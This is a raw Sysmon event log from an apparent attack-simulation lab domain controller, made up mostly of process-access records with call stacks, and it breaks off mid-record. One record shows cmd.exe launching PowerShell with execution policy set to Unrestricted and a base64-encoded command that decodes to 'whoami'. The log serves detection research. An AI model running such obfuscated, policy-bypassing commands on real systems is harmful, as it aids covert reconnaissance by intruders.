dwBoAG8AYQBtAGkA 10341000x80000000000000002762Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.831{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C99-5FA1-8300-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002761Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.831{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C99-5FA1-8300-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002760Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.784{D28789B6-7C99-5FA1-8300-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_g3g0m45h.as4.ps12020-11-03 15:51:53.784 10341000x80000000000000002759Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.784{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C99-5FA1-8300-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002758Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C99-5FA1-8100-000000008801}50964368C:\Windows\system32\conhost.exe{D28789B6-7C99-5FA1-8300-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002757Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002756Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002755Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002754Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002753Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002752Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002751Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002750Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002749Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002748Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002747Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002746Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C99-5FA1-8300-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002745Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C99-5FA1-8200-000000008801}23122308C:\Windows\system32\cmd.exe{D28789B6-7C99-5FA1-8300-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002744Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.761{D28789B6-7C99-5FA1-8300-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C99-5FA1-C621-050000000000}0x521c60HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C99-5FA1-8200-000000008801}2312C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000002743Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002742Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C99-5FA1-8100-000000008801}50964368C:\Windows\system32\conhost.exe{D28789B6-7C99-5FA1-8200-000000008801}2312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002741Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002740Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002739Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002738Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002737Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002736Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 